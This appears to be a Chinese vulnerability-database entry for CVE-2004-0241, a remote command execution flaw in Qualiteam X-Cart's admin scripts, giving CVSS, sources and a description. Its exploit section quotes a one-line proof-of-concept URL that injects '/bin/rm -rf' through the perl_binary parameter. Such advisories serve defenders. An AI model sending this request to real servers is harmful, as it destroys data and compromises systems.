Qualiteam X-Cart远程命令执行漏洞

Qualiteam X-Cart远程命令执行漏洞

漏洞ID 1107681 漏洞类型 输入验证
发布时间 2004-02-03 更新时间 2005-10-20
图片[1]-Qualiteam X-Cart远程命令执行漏洞-安全小百科CVE编号 CVE-2004-0241
图片[2]-Qualiteam X-Cart远程命令执行漏洞-安全小百科CNNVD-ID CNNVD-200411-162
漏洞平台 PHP CVSS评分 10.0
|漏洞来源
https://www.exploit-db.com/exploits/23637
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200411-162
|漏洞详情
X-Cart是一款基于PHP的电子商务程序。X-Cart没有充分过滤URI的参数值,远程攻击者可以利用这个漏洞以WEB进程权限执行任意命令。问题存在与’admin/general.php’脚本上,由于对[perl_binary]参数值缺少充分过滤,提交任意SHELL命令,可导致以WEB进程权限在系统上执行任意命令。
|漏洞EXP
source: http://www.securityfocus.com/bid/9560/info
 
X-Cart has been reported to be prone to an issue that may allow remote attackers to execute arbitrary commands on the affected system. The issue is caused by a failure of the application to sanitize values specified by parameters in the URI. 

http://server/admin/upgrade.php?prepatch_errorcode=1&patch_files[0][orig_file]=VERSION&perl_binary=/bin/rm -rf &patch_exe=..
|参考资料

来源:BID
名称:9560
链接:http://www.securityfocus.com/bid/9560
来源:XF
名称:xcart-perlbinary-execute-commands(15034)
链接:http://xforce.iss.net/xforce/xfdb/15034
来源:BUGTRAQ
名称:20040203X-Cartvulnerability
链接:http://marc.theaimsgroup.com/?l=bugtraq&m;=107582648326448&w;=2

相关推荐: PvPGN GameReport Packet Handler Remote Buffer Overflow Vulnerability

PvPGN GameReport Packet Handler Remote Buffer Overflow Vulnerability 漏洞ID 1097678 漏洞类型 Boundary Condition Error 发布时间 2004-11-09 更新…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享